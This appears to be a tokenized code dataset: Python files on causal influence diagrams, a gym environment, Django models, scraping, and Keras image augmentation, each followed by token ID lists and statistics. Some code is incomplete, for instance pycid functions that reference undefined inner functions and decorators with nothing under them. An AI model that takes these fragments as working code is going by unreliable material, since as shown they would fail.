from __future__ import annotations
import itertools
import math
from functools import lru_cache
from typing import (
Any,
Callable,
Collection,
Dict,
Hashable,
Iterable,
Iterator,
KeysView,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Union,
)
from warnings import warn
import matplotlib.cm as cm
import networkx as nx
import numpy as np
from pgmpy.factors.discrete import TabularCPD
from pgmpy.inference.ExactInference import BeliefPropagation
from pycid.core.causal_bayesian_network import CausalBayesianNetwork, Relationship
from pycid.core.cpd import DecisionDomain, Outcome, StochasticFunctionCPD
from pycid.core.relevance_graph import RelevanceGraph
AgentLabel = Hashable # Could be a TypeVar instead but that might be overkill
class MACIDBase(CausalBayesianNetwork):
"""Base structure of a Multi-Agent Causal Influence Diagram.
Attributes
----------
agent_decisions: The decision nodes of each agent.
A dictionary mapping agent label => nodes labels.
agent_utilities: The utility nodes of each agent.
A dictionary mapping agent label => node labels.
decision_agent: The agent owner of each decision node.
A dictionary mapping decision node label => agent label.
utility_agent: The agent owner of each utility node.
A dictionary mapping utility node label => agent label.
"""
def __init__(
self,
edges: Iterable[Tuple[str, str]] = None,
agent_decisions: Mapping[AgentLabel, List[str]] = None,
agent_utilities: Mapping[AgentLabel, List[str]] = None,
**kwargs: Any,
):
"""Initialize a new MACIDBase instance.
Parameters
----------
edges: A set of directed edges. Each is a pair of node labels (tail, head).
agent_decisions: The decision nodes of each agent.
A mapping of agent label => nodes labels.
agent_utilities: The utility nodes of each agent.
A mapping of agent label => node labels.
"""
super().__init__(edges=edges, **kwargs)
self.agent_decisions = dict(agent_decisions) if agent_decisions else {}
self.agent_utilities = dict(agent_utilities) if agent_utilities else {}
self.decision_agent = {node: agent for agent, nodes in self.agent_decisions.items() for node in nodes}
self.utility_agent = {node: agent for agent, nodes in self.agent_utilities.items() for node in nodes}
@property
def decisions(self) -> KeysView[str]:
"""The set of all decision nodes"""
return self.decision_agent.keys()
@property
def utilities(self) -> KeysView[str]:
"""The set of all utility nodes"""
return self.utility_agent.keys()
@property
def agents(self) -> KeysView[AgentLabel]:
"""The set of all agents"""
return self.agent_utilities.keys()
def make_decision(self, node: str, agent: AgentLabel = 0) -> None:
""" "Turn a chance or utility node into a decision node.
- agent specifies which agent the decision node should belong to in a MACID.
"""
self.make_chance(node)
if agent not in self.agent_decisions:
self.agent_decisions[agent] = [node]
else:
self.agent_decisions[agent].append(node)
self.decision_agent[node] = agent
def make_utility(self, node: str, agent: AgentLabel = 0) -> None:
""" "Turn a chance or utility node into a decision node."""
self.make_chance(node)
if agent not in self.agent_utilities:
self.agent_utilities[agent] = [node]
else:
self.agent_utilities[agent].append(node)
self.utility_agent[node] = agent
def make_chance(self, node: str) -> None:
"""Turn a decision node into a chance node."""
if node not in self.nodes():
raise KeyError(f"The node {node} is not in the (MA)CID")
elif node in set(self.decisions):
agent = self.decision_agent.pop(node)
self.agent_decisions[agent].remove(node)
elif node in set(self.utilities):
agent = self.utility_agent.pop(node)
self.agent_utilities[agent].remove(node)
def query(
self, query: Iterable[str], context: Dict[str, Outcome], intervention: Dict[str, Outcome] = None
) -> BeliefPropagation:
"""Return P(query|context, do(intervention))*P(context | do(intervention)).
Use factor.normalize to get p(query|context, do(intervention)).
Use context={} to get P(query).
Parameters
----------
query: A set of nodes to query.
context: Node values to condition upon. A dictionary mapping of node => outcome.
intervention: Interventions to apply. A dictionary mapping node => outcome.
"""
for variable, outcome in context.items():
if outcome not in self.get_cpds(variable).domain:
raise ValueError(f"The outcome {outcome} is not in the domain of {variable}")
intervention = intervention or {}
# Check that strategically relevant decisions have a policy specified
mech_graph = MechanismGraph(self)
for intervention_var in intervention:
for parent in self.get_parents(intervention_var):
mech_graph.remove_edge(parent, intervention_var)
for decision in self.decisions:
for query_node in query:
if mech_graph.is_dconnected(
decision + "mec", query_node, observed=list(context.keys()) + list(intervention.keys())
):
cpd = self.get_cpds(decision)
if not cpd:
raise ValueError(f"no DecisionDomain specified for {decision}")
elif isinstance(cpd, DecisionDomain):
raise ValueError(
f"P({query}|{context}, do({intervention})) depends on {decision}, but no policy imputed"
)
return super().query(query, context, intervention)
def expected_utility(
self, context: Dict[str, Outcome], intervention: Dict[str, Outcome] = None, agent: AgentLabel = 0
) -> float:
"""Compute the expected utility of an agent for a given context and optional intervention
For example:
cid = get_minimal_cid()
out = self.expected_utility({'D':1}) #TODO: give example that uses context
Parameters
----------
context: Node values to condition upon. A dictionary mapping of node => value.
intervention: Interventions to apply. A dictionary mapping node => value.
agent: Evaluate the utility of this agent.
"""
return sum(self.expected_value(self.agent_utilities[agent], context, intervention=intervention))
def get_valid_order(self, nodes: Optional[Iterable[str]] = None) -> List[str]:
"""Get a topological order of the specified set of nodes (this may not be unique).
By default, a topological ordering of the decision nodes is given"""
if not nx.is_directed_acyclic_graph(self):
raise ValueError("A topological ordering of nodes can only be returned if the (MA)CID is acyclic")
if nodes is None:
nodes = self.decisions
else:
nodes = set(nodes)
for node in nodes:
if node not in self.nodes:
raise KeyError(f"{node} is not in the (MA)CID.")
srt = [node for node in nx.topological_sort(self) if node in nodes]
return srt
def is_s_reachable(self, d1: Union[str, Iterable[str]], d2: Union[str, Iterable[str]]) -> bool:
"""
Determine whether 'D2' is s-reachable from 'D1' (Koller and Milch, 2001)
A node D2 is s-reachable from a node D1 in a MACID M if there is some utility node U ∈ U_D1 ∩ Desc(D1)
such that if a new parent D2' were added to D2, there would be an active path in M from
D2′ to U given Pa(D)∪{D}, where a path is active in a MAID if it is active in the same graph, viewed as a BN.
"""
assert d2 in self.decisions
return self.is_r_reachable(d1, d2)
def is_r_reachable(self, decisions: Union[str, Iterable[str]], nodes: Union[str, Iterable[str]]) -> bool:
"""
Determine whether (a set of) node(s) is r-reachable from decision in the (MA)CID.
- A node 𝑉 is r-reachable from a decision 𝐷 ∈ 𝑫^𝑖 in a MAID, M = (𝑵, 𝑽, 𝑬),
if a newly added parent 𝑉ˆ of 𝑉 satisfies 𝑉ˆ ̸⊥ 𝑼^𝑖 ∩ Desc_𝐷 | Fa_𝐷 .
- If a node V is r-reachable from a decision D that means D strategically or probabilisticaly relies on V.
"""
if isinstance(decisions, str):
decisions = [decisions]
if isinstance(nodes, str):
nodes = [nodes]
mg = MechanismGraph(self)
for decision in decisions:
for node in nodes:
con_nodes = [decision] + self.get_parents(decision)
agent_utilities = self.agent_utilities[self.decision_agent[decision]]
for utility in set(agent_utilities).intersection(nx.descendants(self, decision)):
if mg.is_dconnected(node + "mec", utility, con_nodes):
return True
return False
def sufficient_recall(self, agent: Optional[AgentLabel] = None) -> bool:
"""
Returns true if the agent has sufficient recall in the (MA)CID.
Agent i in the (MA)CID has sufficient recall if the relevance graph
restricted to contain only i's decision nodes is acyclic.
If an agent is specified, sufficient recall is checked only for that agent.
Otherwise, the check is done for all agents.
"""
if agent is None:
agents: Collection = self.agents
elif agent not in self.agents:
raise ValueError(f"There is no agent {agent}, in this (MA)CID")
else:
agents = [agent]
for a in agents:
rg = RelevanceGraph(self, self.agent_decisions[a])
if not rg.is_acyclic():
return False
return True
def pure_decision_rules(self, decision: str) -> Iterator[StochasticFunctionCPD]:
"""Return a list of the decision rules available at the given decision"""
domain = self.model.domain[decision]
parents = self.get_parents(decision)
parent_cardinalities = [self.get_cardinality(parent) for parent in parents]
# We begin by representing each possible decision rule as a tuple of outcomes, with
# one element for each possible decision context
number_of_decision_contexts = int(np.product(parent_cardinalities))
functions_as_tuples = itertools.product(domain, repeat=number_of_decision_contexts)
def arg2idx(pv: Dict[str, Outcome]) -> int:
"""Convert a decision context into an index for the function list"""
idx = 0
for i, parent in enumerate(parents):
name_to_no: Dict[Outcome, int] = self.get_cpds(parent).name_to_no[parent]
idx += name_to_no[pv[parent]] * int(np.product(parent_cardinalities[:i]))
assert 0 <= idx <= number_of_decision_contexts
return idx
for func_list in functions_as_tuples:
yield StochasticFunctionCPD(decision, produce_function(), self, domain=domain)
def pure_policies(self, decision_nodes: Iterable[str]) -> Iterator[Tuple[StochasticFunctionCPD, ...]]:
"""
Iterate over all of an agent's pure policies in this subgame.
"""
possible_dec_rules = list(map(self.pure_decision_rules, decision_nodes))
return itertools.product(*possible_dec_rules)
def optimal_pure_policies(
self, decisions: Iterable[str], rel_tol: float = 1e-9
) -> List[Tuple[StochasticFunctionCPD, ...]]:
"""Find all optimal policies for a given set of decisions.
- All decisions must belong to the same agent.
- rel_tol: is the relative tolerance. It is the amount of error allowed, relative to the larger
absolute value of the two values it is comparing (the two utilities.)
"""
if not decisions:
return []
decisions = set(decisions)
try:
(agent,) = {self.decision_agent[d] for d in decisions}
except ValueError:
raise ValueError("Decisions not all from the same agent")
macid = self.copy()
for d in macid.decisions:
if (
isinstance(macid.get_cpds(d), DecisionDomain)
and not macid.is_s_reachable(decisions, d)
and d not in decisions
):
macid.impute_random_decision(d)
optimal_policies = []
max_utility = float("-inf")
for policy in macid.pure_policies(decisions):
macid.add_cpds(*policy)
expected_utility = macid.expected_utility({}, agent=agent)
if math.isclose(expected_utility, max_utility, rel_tol=rel_tol):
optimal_policies.append(policy)
elif expected_utility > max_utility:
optimal_policies = [policy]
max_utility = expected_utility
return optimal_policies
def optimal_pure_decision_rules(self, decision: str) -> List[StochasticFunctionCPD]:
"""
Return a list of all optimal pure decision rules for a given decision
"""
return [policy[0] for policy in self.optimal_pure_policies([decision])]
def impute_random_decision(self, d: str) -> None:
"""Impute a random policy to the given decision node"""
try:
domain = self.model.domain[d]
except KeyError:
raise ValueError(f"can't figure out domain for {d}, did you forget to specify DecisionDomain?")
else:
self.model[d] = StochasticFunctionCPD(
d, lambda **pv: {outcome: 1 / len(domain) for outcome in domain}, self, domain, label="random_decision"
)
def impute_fully_mixed_policy_profile(self) -> None:
"""Impute a fully mixed policy profile - ie a random decision rule to all decision nodes"""
for d in self.decisions:
self.impute_random_decision(d)
def remove_all_decision_rules(self) -> None:
"""Remove the decision rules from all decisions in the (MA)CID"""
for d in self.decisions:
self.model[d] = self.model.domain[d]
def impute_optimal_decision(self, decision: str) -> None:
"""Impute an optimal policy to the given decision node"""
# self.add_cpds(random.choice(self.optimal_pure_decision_rules(d)))
self.impute_random_decision(decision)
domain = self.model.domain[decision]
utility_nodes = self.agent_utilities[self.decision_agent[decision]]
descendant_utility_nodes = list(set(utility_nodes).intersection(nx.descendants(self, decision)))
copy = self.copy() # using a copy "freezes" the policy so it doesn't adapt to future interventions
@lru_cache(maxsize=1000)
self.add_cpds(StochasticFunctionCPD(decision, opt_policy, self, domain=domain, label="opt"))
def impute_conditional_expectation_decision(self, decision: str, y: str) -> None:
"""Imputes a policy for decision = the expectation of y conditioning on d's parents"""
# TODO: Move to analyze, as this is not really a core feature?
copy = self.copy()
@lru_cache(maxsize=1000)
self.add_cpds(**{decision: cond_exp_policy})
# Wrapper around DAG.active_trail_nodes to accept arbitrary iterables for observed.
# Really, DAG.active_trail_nodes should accept Sets, especially since it does
# inefficient membership checks on observed as a list.
def copy_without_cpds(self) -> MACIDBase:
"""copy the MACIDBase object without its CPDs"""
new = MACIDBase()
new.add_nodes_from(self.nodes)
new.add_edges_from(self.edges)
for agent in self.agents:
for decision in self.agent_decisions[agent]:
new.make_decision(decision, agent)
for utility in self.agent_utilities[agent]:
new.make_utility(utility, agent)
return new
def _get_color(self, node: str) -> Union[np.ndarray, str]:
"""
Assign a unique colour to each new agent's decision and utility nodes
"""
agents = list(self.agents)
colors = cm.rainbow(np.linspace(0, 1, len(agents)))
try:
agent = self.decision_agent[node]
except KeyError:
try:
agent = self.utility_agent[node]
except KeyError:
agent = None
if agent is not None:
color: np.ndarray = colors[[agents.index(agent)]]
return color
else:
return "lightgray" # chance node
class MechanismGraph(MACIDBase):
"""A mechanism graph has an extra parent node+"mec" for each node"""
| [
6738,
11593,
37443,
834,
1330,
37647,
198,
198,
11748,
340,
861,
10141,
198,
11748,
10688,
198,
6738,
1257,
310,
10141,
1330,
300,
622,
62,
23870,
198,
6738,
19720,
1330,
357,
198,
220,
220,
220,
4377,
11,
198,
220,
220,
220,
4889,
54... | 2.413294 | 7,116 |
from authUser.models import CustomAccount
from interestsProfile.models import InterestProfile, AlgoIDToUserID
from interestsProfile.matching_algo import MatchingAlgo
from profileUser.interests_list import length
| [
6738,
6284,
12982,
13,
27530,
1330,
8562,
30116,
198,
6738,
5353,
37046,
13,
27530,
1330,
12033,
37046,
11,
978,
2188,
2389,
2514,
12982,
2389,
198,
6738,
5353,
37046,
13,
15699,
278,
62,
282,
2188,
1330,
13225,
278,
2348,
2188,
198,
67... | 4.176471 | 51 |
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import numpy as np
from gym import spaces
from gym_brt.envs.qube_base_env import QubeBaseEnv
"""
Description:
A pendulum is attached to an un-actuated joint to a horizontal arm,
which is actuated by a rotary motor. The pendulum begins
downwards and the goal is flip the pendulum up and then to keep it from
falling by applying a voltage on the motor which causes a torque on the
horizontal arm.
Source:
This is modified for the Quanser Qube Servo2-USB from the Cart Pole
problem described by Barto, Sutton, and Anderson, and implemented in
OpenAI Gym: https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py
This description is also modified from the description by the OpenAI
team.
Observation:
Type: Box(4)
Num Observation Min Max
0 Rotary arm angle (theta) -90 deg 90 deg
1 Pendulum angle (alpha) -180 deg 180 deg
2 Cart Velocity -Inf Inf
3 Pole Velocity -Inf Inf
Note: the velocities are limited by the physical system.
Actions:
Type: Real number (1-D Continuous) (voltage applied to motor)
Reward:
r(s_t, a_t) = 1 - (0.8 * abs(alpha) + 0.2 * abs(theta)) / pi
Starting State:
Theta = 0 + noise, alpha = pi + noise
Episode Termination:
When theta is greater than ±90° or after 2048 steps
"""
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
6738,
11593,
37443,
834,
1330,
7297,
198,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
11550,
1330,
9029,
198,
6738,
11550,
62,
1... | 2.464555 | 663 |
"""
Input/output with the CHO_K1 model files.
"""
import os
import subprocess
def gunzip(path, keep=True):
"""
Check if file is gzipped, in which case extract it (replacing output).
Returns original path.
"""
if os.path.exists(path + '.gz'):
if keep:
subprocess.call(['gunzip', '--force', '--keep', path + '.gz'])
else:
subprocess.call(['gunzip', '--force', path + '.gz'])
elif not os.path.exists(path):
raise FileNotFoundError
return path
def gzip(path, keep=True):
"Compress file (replacing output)."
if os.path.exists(path):
if keep:
subprocess.call(['gzip', '--force', '--keep', path])
else:
subprocess.call(['gzip', '--force', path])
else:
raise FileNotFoundError
return path
| [
37811,
198,
20560,
14,
22915,
351,
262,
49143,
62,
42,
16,
2746,
3696,
13,
198,
37811,
198,
198,
11748,
28686,
198,
11748,
850,
14681,
628,
198,
4299,
2485,
13344,
7,
6978,
11,
1394,
28,
17821,
2599,
198,
220,
220,
220,
37227,
198,
... | 2.262873 | 369 |
# -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
import threading
from time import sleep
from unittest import TestCase, SkipTest
from unittest.mock import MagicMock
from PyQt5.QtCore import QCoreApplication, QEventLoop
from qgis_plutil.thread_support.gui_side import GuiSide
from qgis_plutil.thread_support.messages.base import TsMessage
from qgis_plutil.thread_support.thread_side import ThreadSide
logger = logging.getLogger('tests.plutil.thread_support')
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
37811,
198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
198,
11748,
18931,
198,
11748,... | 3.109195 | 174 |
# +-----------------------------------------------------------------------------+
# | Copyright 2019-2020 IBM Corp. All Rights Reserved. |
# | |
# | Licensed under the Apache License, Version 2.0 (the "License"); |
# | you may not use this file except in compliance with the License. |
# | You may obtain a copy of the License at |
# | |
# | http://www.apache.org/licenses/LICENSE-2.0 |
# | |
# | Unless required by applicable law or agreed to in writing, software |
# | distributed under the License is distributed on an "AS IS" BASIS, |
# | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
# | See the License for the specific language governing permissions and |
# | limitations under the License. |
# +-----------------------------------------------------------------------------+
# | Authors: Lorenz K. Mueller, Pascal Stark |
# +-----------------------------------------------------------------------------+
""" Creates a very simple recurrent network with a testbench.
This is the example used in the basic usage guide.
The network topology is as follows:
A -> B
^ v
D <- C
A testbench is used to inject time varying signals at node A and B.
"""
from colna.analyticnetwork import Network, Edge, Testbench
import numpy as np
import matplotlib.pyplot as plt
### Create the Network and add the nodes
net = Network()
net.add_node(name='a')
net.add_node(name='b')
net.add_node(name='c')
net.add_node(name='d')
net.add_edge(Edge(start='a',end='b',phase=1,attenuation=0.8,delay=1))
net.add_edge(Edge(start='b',end='c',phase=2,attenuation=0.7,delay=2))
net.add_edge(Edge(start='c',end='d',phase=3,attenuation=0.8,delay=1))
net.add_edge(Edge(start='d',end='a',phase=-1,attenuation=0.9,delay=0.5))
net.visualize(path='./visualizations/recurrent_with_testbench')
### Create a testbench
tb = Testbench(network=net, timestep=0.1) # Timestep should be factor of all delays
x_in_a = np.sin(np.linspace(0,15,500))+1.5 # create the input signal (Dimensino N)
t_in = np.linspace(0, 10, num=501) # create the input time vector (Dimension N+1)
tb.add_input_sequence(node_name='a',x=x_in_a,t=t_in)
# add output nodes to testbench (nodes at which output signal should be recorded)
tb.add_output_node('c')
tb.add_output_node('d')
# evaluate the network (through the testbench)
tb.evaluate_network(amplitude_cutoff=1e-6)
# Calculate the output signal at the output nodes
tb.calculate_output(n_threads=8) # uses multithreading with at most 8 threads
t, x = tb.t_out.transpose(), tb.x_out.transpose()
### Plot the signals
plt.plot(tb.input_t[0][:-1], np.abs(tb.input_x[0][:-1]), 'o') # Input signal
plt.plot(t, np.abs(x), 'x') # Output signal
plt.xlabel('Time')
plt.ylabel('|x|')
plt.legend(['Input', 'Output C', 'Output D'], loc='lower left')
plt.grid()
# plt.savefig('basic_feedforward_tb_output.svg')
plt.show()
| [
2,
1343,
10097,
10541,
19529,
198,
2,
930,
220,
15069,
13130,
12,
42334,
19764,
11421,
13,
1439,
6923,
33876,
13,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2... | 2.354286 | 1,400 |
from .fs import FileSystemResultsImporter, BinResultsImporter, JsonResultsImporter
| [
6738,
764,
9501,
1330,
9220,
11964,
25468,
3546,
26634,
11,
20828,
25468,
3546,
26634,
11,
449,
1559,
25468,
3546,
26634,
198
] | 3.952381 | 21 |
import os
import tensorflow as tf
from tensorflow.keras.layers import (
BatchNormalization,
Conv2D,
Conv2DTranspose,
Dense,
Flatten,
Input,
Layer,
LeakyReLU,
ReLU,
Reshape,
)
from tensorflow.keras.models import Model
from tqdm import tqdm
from awesome_gans.losses import discriminator_loss, generator_loss, discriminator_wgan_loss, generator_wgan_loss
from awesome_gans.optimizers import build_optimizer
from awesome_gans.utils import merge_images, save_image
| [
11748,
28686,
198,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
6738,
11192,
273,
11125,
13,
6122,
292,
13,
75,
6962,
1330,
357,
198,
220,
220,
220,
347,
963,
26447,
1634,
11,
198,
220,
220,
220,
34872,
17,
35,
11,
198,
220,
220,... | 2.718919 | 185 |
from bs4 import BeautifulSoup
import datetime
import unicodedata
def fetch_timeline(response):
'''
Fetch latest COVID-19 news.
Input: HTML content fetched from the web.
Return (
unix_timestamp,
list of paragraphs (unicode NFKC normalized)
)
'''
soup = BeautifulSoup(response, features="html.parser")
# Fetch latest news
timeline = soup.find("div", {"class": "timeline-detail"})
date = timeline.find("div", {"class": "timeline-head"}).text.strip()
content = timeline.find("div", {"class": "timeline-content"})
# Convert from string to datetime
date = datetime.datetime.strptime(date, '%H:%M %d/%m/%Y')
# Convert from UTF+7 to UTC+0
date = date - datetime.timedelta(hours=7)
timestamp = date.timestamp()
# Normalize content
content = unicodedata.normalize('NFKC', content.text).strip()
# Split lines
lines = content.splitlines()
return timestamp, lines | [
6738,
275,
82,
19,
1330,
23762,
50,
10486,
201,
198,
11748,
4818,
8079,
201,
198,
11748,
28000,
9043,
1045,
201,
198,
201,
198,
4299,
21207,
62,
16514,
4470,
7,
26209,
2599,
201,
198,
220,
220,
220,
705,
7061,
201,
198,
220,
220,
22... | 2.492537 | 402 |
import setuptools
REQUIRED_PACKAGES = []
PACKAGE_NAME = 'my_alice_pipeline'
PACKAGE_VERSION = '1.0.0'
setuptools.setup(
name=PACKAGE_NAME,
version=PACKAGE_VERSION,
description='Alice in Wonderland pipeline',
url="https://github.com/horns-g/DataPipelines",
author="Gabriele Corni",
author_email="gabriele_corni@iprel.it",
install_requires=REQUIRED_PACKAGES,
packages=setuptools.find_packages(),
)
| [
11748,
900,
37623,
10141,
628,
198,
2200,
10917,
37819,
62,
47,
8120,
25552,
796,
17635,
198,
47,
8120,
11879,
62,
20608,
796,
705,
1820,
62,
282,
501,
62,
79,
541,
4470,
6,
198,
47,
8120,
11879,
62,
43717,
796,
705,
16,
13,
15,
1... | 2.443182 | 176 |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None | [
2,
30396,
329,
257,
13934,
5509,
10139,
13,
198,
2,
1398,
12200,
19667,
25,
198,
2,
220,
220,
220,
220,
825,
11593,
15003,
834,
7,
944,
11,
2124,
2599,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
2116,
13,
2100,
796,
2124,
1... | 2.175676 | 74 |
from .config import Config
from flask import g, request
import traceback
from piperci.gman import client as gman_client
| [
6738,
764,
11250,
1330,
17056,
198,
198,
6738,
42903,
1330,
308,
11,
2581,
198,
11748,
12854,
1891,
198,
198,
6738,
279,
9346,
979,
13,
70,
805,
1330,
5456,
355,
308,
805,
62,
16366,
628,
198
] | 3.542857 | 35 |
from django.core.validators import RegexValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
from dry_rest_permissions.generics import authenticated_users
from results.mixins.change_log import LogChangesMixing
from results.models.organizations import Organization
class Event(LogChangesMixing, models.Model):
"""Stores a single event.
Related to
- :class:`.organization.Organization`
"""
name = models.CharField(max_length=255, verbose_name=_('Name'))
description = models.TextField(blank=True, verbose_name=_('Description'))
date_start = models.DateField(verbose_name=_('Start date'))
date_end = models.DateField(verbose_name=_('End date'))
location = models.CharField(max_length=255, verbose_name=_('Location'))
organization = models.ForeignKey(Organization, on_delete=models.SET_NULL, null=True)
approved = models.BooleanField(default=False, verbose_name=_('Approved'))
locked = models.BooleanField(default=False, verbose_name=_('Edit lock'))
public = models.BooleanField(default=False, verbose_name=_('Public'))
categories = models.TextField(blank=True, verbose_name=_('Competition categories'))
optional_dates = models.TextField(blank=True, verbose_name=_('Optional dates'))
web_page = models.URLField(blank=True, verbose_name=_('Web page'))
invitation = models.URLField(blank=True, verbose_name=_('Invitation URL'))
notes = models.TextField(blank=True, verbose_name=_('Generic notes'))
safety_plan = models.BooleanField(default=False, verbose_name=_('Safety plan exists'))
international = models.BooleanField(default=False, verbose_name=_('International competition'))
toc_agreement = models.BooleanField(default=False, verbose_name=_('Terms and Conditions agreement'))
created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created at'))
updated_at = models.DateTimeField(auto_now=True, verbose_name=_('Updated at'))
@staticmethod
@staticmethod
@authenticated_users
@authenticated_users
@authenticated_users
class EventContact(LogChangesMixing, models.Model):
"""Stores a single contact for the event.
Related to
- :class:`.events.EventRegistration`
"""
TYPE_CHOICES = [
('contact', _('Generic contact')),
('manager', _('Competition manager')),
('head judge', _('Head judge')),
('technical', _('Technical manager'))
]
phone_regex = RegexValidator(regex=r'^\+?1?\d{7,15}$',
message=_('Phone number may start with "+" and only contain digits.'))
event = models.ForeignKey(Event, on_delete=models.CASCADE)
type = models.CharField(max_length=10, choices=TYPE_CHOICES, verbose_name=_('Contact type'))
first_name = models.CharField(max_length=100, verbose_name=_('First name'))
last_name = models.CharField(max_length=100, verbose_name=_('Last name'))
email = models.EmailField(blank=True, verbose_name=_('Email address'))
phone = models.CharField(max_length=17, validators=[phone_regex], blank=True, verbose_name=_('Phone number'))
@staticmethod
@staticmethod
@authenticated_users
@authenticated_users
@authenticated_users
| [
6738,
42625,
14208,
13,
7295,
13,
12102,
2024,
1330,
797,
25636,
47139,
1352,
198,
6738,
42625,
14208,
13,
9945,
1330,
4981,
198,
6738,
42625,
14208,
13,
26791,
13,
41519,
1330,
334,
1136,
5239,
62,
75,
12582,
355,
4808,
198,
6738,
5894... | 2.829991 | 1,147 |
import os
import pandas
import PIL.Image as pil
import numpy
import shutil
from sklearn.model_selection import train_test_split as holdout
from sklearn.model_selection import StratifiedKFold as fold
from keras.preprocessing.image import ImageDataGenerator as idg
strOutputPath = "Output/"
try:
os.makedirs(strOutputPath)
except:
shutil.rmtree(strOutputPath)
os.makedirs(strOutputPath)
################################################################################
##
## 1. Balance holdout
##
## Train data
dataTrain = pandas.read_csv("Holdout/Train/Table.csv")
intTrainBalanceSize = 100000
listClass = list(dataTrain["result"].unique())
listFakeTrain = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataTrain.loc[dataTrain["result"]==i].sample(intTrainBalanceSize, replace =True)
listFakeTrain.append(dataFake)
dataFakeTrain = pandas.concat(listFakeTrain)
dataFakeTrain["id"] = range(dataFakeTrain.shape[0])
strTrainPath = strOutputPath + "Holdout/" + "Train/"
os.makedirs(strTrainPath, exist_ok = True)
dataFakeTrain.to_csv(strTrainPath + "Table.csv", index = False)
for index, data in dataFakeTrain.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Holdout/Train/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Holdout/Train/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
##
## Valid data
dataValid = pandas.read_csv("Holdout/Valid/Table.csv")
intValidBalanceSize = 10000
listClass = list(dataValid["result"].unique())
listFakeValid = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataValid.loc[dataValid["result"]==i].sample(intValidBalanceSize, replace =True)
listFakeValid.append(dataFake)
dataFakeValid = pandas.concat(listFakeValid)
dataFakeValid["id"] = range(dataFakeValid.shape[0])
strValidPath = strOutputPath + "Holdout/" + "Valid/"
os.makedirs(strValidPath, exist_ok = True)
dataFakeValid.to_csv(strValidPath + "Table.csv", index = False)
for index, data in dataFakeValid.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Holdout/Valid/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Holdout/Valid/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
################################################################################
##
## 1. Balance fold
listFold = os.listdir("Fold/")
for strFold in listFold:
##
## Train data
dataTrain = pandas.read_csv("Fold/" + strFold + "/Train/Table.csv")
intTrainBalanceSize = 100000
listClass = list(dataTrain["result"].unique())
listFakeTrain = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataTrain.loc[dataTrain["result"]==i].sample(intTrainBalanceSize, replace =True)
listFakeTrain.append(dataFake)
dataFakeTrain = pandas.concat(listFakeTrain)
dataFakeTrain["id"] = range(dataFakeTrain.shape[0])
strTrainPath = strOutputPath + "Fold/" + strFold + "/Train/"
os.makedirs(strTrainPath, exist_ok = True)
dataFakeTrain.to_csv(strTrainPath + "Table.csv", index = False)
for index, data in dataFakeTrain.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Fold/" + strFold + "/Train/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Fold/" + strFold + "/Train/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
##
## Valid data
dataValid = pandas.read_csv("Fold/" + strFold + "/Valid/Table.csv")
intValidBalanceSize = 10000
listClass = list(dataValid["result"].unique())
listFakeValid = []
for i in listClass:
numpy.random.seed(2018)
dataFake = dataValid.loc[dataValid["result"]==i].sample(intValidBalanceSize, replace =True)
listFakeValid.append(dataFake)
dataFakeValid = pandas.concat(listFakeValid)
dataFakeValid["id"] = range(dataFakeValid.shape[0])
strValidPath = strOutputPath + "Fold/" + strFold + "/Valid/"
os.makedirs(strValidPath, exist_ok = True)
dataFakeValid.to_csv(strValidPath + "Table.csv", index = False)
for index, data in dataFakeValid.iterrows():
file = data["image"]
result = str(data["result"])
image = pil.open("Fold/" + strFold + "/Valid/Image/" + result + '/' + file)
##
## Image generator
generator = idg(rotation_range = 360, horizontal_flip=True, vertical_flip=True)
##
## Old
old = numpy.array(image)
old = old.reshape((1,) + old.shape)
##
## New
new = generator.flow(old).next()
new = new[0,:,:,:].astype("uint8")
new = pil.fromarray(new)
strImagePath = strOutputPath + "Fold/" + strFold + "/Valid/Image/" + result + "/"
os.makedirs(strImagePath, exist_ok = True)
new.save(strImagePath + str(data["id"]) + ".jpg")
| [
11748,
28686,
198,
11748,
